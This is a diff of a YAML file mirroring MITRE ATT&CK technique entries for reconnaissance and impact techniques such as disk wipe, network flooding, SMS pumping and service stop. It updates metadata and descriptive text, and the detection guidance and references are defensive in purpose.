-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.001:
     technique:
@@ -56898,7 +57582,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.025Z'
       name: Determine Physical Locations
       description: |-
         Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -56914,8 +57598,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.001:
     technique:
@@ -56939,7 +57621,7 @@ reconnaissance:
         url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
         description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
           Pad For Phishing Attacks. Retrieved October 20, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:43:12.843Z'
       name: Spearphishing Service
       description: |-
         Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56961,13 +57643,11 @@ reconnaissance:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 impact:
   T1561.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:32:05.064Z'
       name: Disk Structure Wipe
       description: "Adversaries may corrupt or wipe the disk data structures on a
         hard drive necessary to boot a system; targeting specific critical systems
@@ -57059,13 +57739,12 @@ impact:
         url: https://www.symantec.com/connect/blogs/shamoon-attacks
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1498.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:54:49.943Z'
       name: Direct Network Flood
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -57074,7 +57753,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
@@ -57091,17 +57769,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
@@ -57126,7 +57799,8 @@ impact:
         url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491.002:
     technique:
@@ -57164,7 +57838,7 @@ impact:
         description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
           Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
           How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:37.539Z'
       name: External Defacement
       description: 'An adversary may deface systems external to an organization in
         an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -57198,12 +57872,10 @@ impact:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_impact_type:
       - Integrity
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1499.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:51.289Z'
       name: OS Exhaustion Flood
       description: |-
         Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -57268,42 +57940,127 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
-  T1499.003:
+  T1485.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
+      modified: '2024-10-16T21:27:02.481Z'
+      name: Lifecycle-Triggered Deletion
+      description: "Adversaries may modify the lifecycle policies of a cloud storage
+        bucket to destroy all objects stored within.  \n\nCloud storage buckets often
+        allow users to set lifecycle policies to automate the migration, archival,
+        or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+        GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+        has sufficient permissions to modify these policies, they may be able to delete
+        all objects at once. \n\nFor example, in AWS environments, an adversary with
+        the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+        API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+        in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+        to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+        adversaries may also perform this action on buckets storing cloud logs for
+        [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+        Datadog S3 Lifecycle CloudTrail Logs)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Storage: Cloud Storage Modification'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+      created: '2024-09-25T13:16:14.166Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1485/001
+        external_id: T1485.001
+      - source_name: AWS Storage Lifecycles
+        description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+          25, 2024.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+      - source_name: GCP Storage Lifecycles
+        description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+          September 25, 2024.
+        url: https://cloud.google.com/storage/docs/lifecycle
+      - source_name: Azure Storage Lifecycles
+        description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+          policy. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+      - source_name: Palo Alto Cloud Ransomware
+        description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+          in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+          2024.'
+        url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+      - source_name: Datadog S3 Lifecycle CloudTrail Logs
+        description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+          S3 Lifecycle Rule. Retrieved September 25, 2024.
+        url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.003:
+    technique:
+      modified: '2024-10-16T17:45:14.210Z'
+      name: SMS Pumping
+      description: |-
+        Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+        Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
       type: attack-pattern
-      created: '2020-02-20T15:35:00.025Z'
+      id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+      created: '2024-09-25T13:53:19.586Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1499.003
-        url: https://attack.mitre.org/techniques/T1499/003
-      - source_name: Arbor AnnualDoSreport Jan 2018
-        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
-          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
-          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
-          Infrastructure Security Report. Retrieved April 22, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1496/003
+        external_id: T1496.003
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Twilio SMS Pumping
+        description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+          Stop It. Retrieved September 25, 2024.
+        url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+      - source_name: Twilio SMS Pumping Fraud
+        description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+          25, 2024.
+        url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1499.003:
+    technique:
+      modified: '2024-10-15T15:41:49.168Z'
       name: Application Exhaustion Flood
       description: 'Adversaries may target resource intensive features of applications
         to cause a denial of service (DoS), denying availability to those applications.
@@ -57314,13 +58071,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
 
         In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -57328,12 +58092,33 @@ impact:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      created: '2020-02-20T15:35:00.025Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1499/003
+        external_id: T1499.003
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: Arbor AnnualDoSreport Jan 2018
+        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+          Infrastructure Security Report. Retrieved April 22, 2019.
+        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1561:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-20T18:16:41.942Z'
       name: Disk Wipe
       description: |-
         Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -57394,109 +58179,79 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1565.001:
     technique:
+      modified: '2024-08-26T16:33:33.982Z'
+      name: Stored Data Manipulation
+      description: |-
+        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: Where applicable, inspect important file hashes, locations,
+        and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      - 'File: File Creation'
+      - 'File: File Deletion'
+      x_mitre_impact_type:
+      - Integrity
       type: attack-pattern
       id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
       created: '2020-03-02T14:22:24.410Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.001
         url: https://attack.mitre.org/techniques/T1565/001
+        external_id: T1565.001
       - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
         description: Department of Justice. (2018, September 6). Criminal Complaint
           - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
       - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
         description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
           November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
-        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Stored Data Manipulation
-      x_mitre_detection: Where applicable, inspect important file hashes, locations,
-        and modifications for suspicious/unexpected values.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'File: File Modification'
-      - 'File: File Creation'
-      - 'File: File Deletion'
-      x_mitre_impact_type:
-      - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1489:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
-      created: '2019-03-29T19:00:55.901Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1489
-        url: https://attack.mitre.org/techniques/T1489
-      - source_name: SecureWorks WannaCry Analysis
-        url: https://www.secureworks.com/research/wcry-ransomware-analysis
-        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
-          Analysis. Retrieved March 26, 2019.
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Novetta Blockbuster
-        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
-        description: 'Novetta Threat Research Group. (2016, February 24). Operation
-          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
-          25, 2016.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-12T15:57:27.380Z'
+      name: Service Stop
       description: "Adversaries may stop or disable services on a system to render
         those services unavailable to legitimate users. Stopping critical services
         or processes can inhibit or stop response to an incident or aid in the adversary's
         overall objectives to cause damage to the environment.(Citation: Talos Olympic
         Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
         this by disabling individual services of high importance to an organization,
-        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible
-        (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
-        many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+        such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation:
+        Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+        all services to render systems unusable.(Citation: Talos Olympic Destroyer
         2018) Services or processes may not allow for modification of their data stores
         while running. Adversaries may stop services or processes in order to conduct
         [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
         for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
         of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Service Stop
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
 
@@ -57505,10 +58260,14 @@ impact:
         Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
 
         Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, <code>ChangeServiceConfigW</code> may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Process: Process Termination'
@@ -57519,39 +58278,37 @@ impact:
       - 'Service: Service Metadata'
       x_mitre_impact_type:
       - Availability
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+      created: '2019-03-29T19:00:55.901Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1489
+        external_id: T1489
+      - source_name: SecureWorks WannaCry Analysis
+        description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+          Analysis. Retrieved March 26, 2019.
+        url: https://www.secureworks.com/research/wcry-ransomware-analysis
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Novetta Blockbuster
+        description: 'Novetta Threat Research Group. (2016, February 24). Operation
+          Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+          25, 2016.'
+        url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1489
     atomic_tests: []
   T1499.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
-      type: attack-pattern
-      created: '2020-02-20T15:37:27.052Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1499.004
-        url: https://attack.mitre.org/techniques/T1499/004
-      - source_name: Sucuri BIND9 August 2015
-        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
-        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
-          in the Wild. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T15:42:23.001Z'
       name: Application or System Exploitation
       description: "Adversaries may exploit software vulnerabilities that can cause
         an application or system to crash and deny availability to users. (Citation:
@@ -57569,13 +58326,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Attacks targeting web applications may generate logs in the
         web server, application server, and/or database server that can be used to
         identify the type of attack. Externally monitor the availability of services
         that may be targeted by an Endpoint DoS.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -57583,36 +58347,27 @@ impact:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1565.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
       type: attack-pattern
-      created: '2020-03-02T14:30:05.252Z'
+      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+      created: '2020-02-20T15:37:27.052Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.003
-        url: https://attack.mitre.org/techniques/T1565/003
-      - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-        url: https://content.fireeye.com/apt/rpt-apt38
-        source_name: FireEye APT38 Oct 2018
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1499/004
+        external_id: T1499.004
+      - source_name: Sucuri BIND9 August 2015
+        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+          in the Wild. Retrieved April 26, 2019.
+        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1565.003:
+    technique:
+      modified: '2024-10-15T18:21:43.760Z'
       name: Runtime Data Manipulation
       description: |-
         Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -57621,11 +58376,17 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Inspect important application binary file hashes, locations,
         and modifications for suspicious/unexpected values.
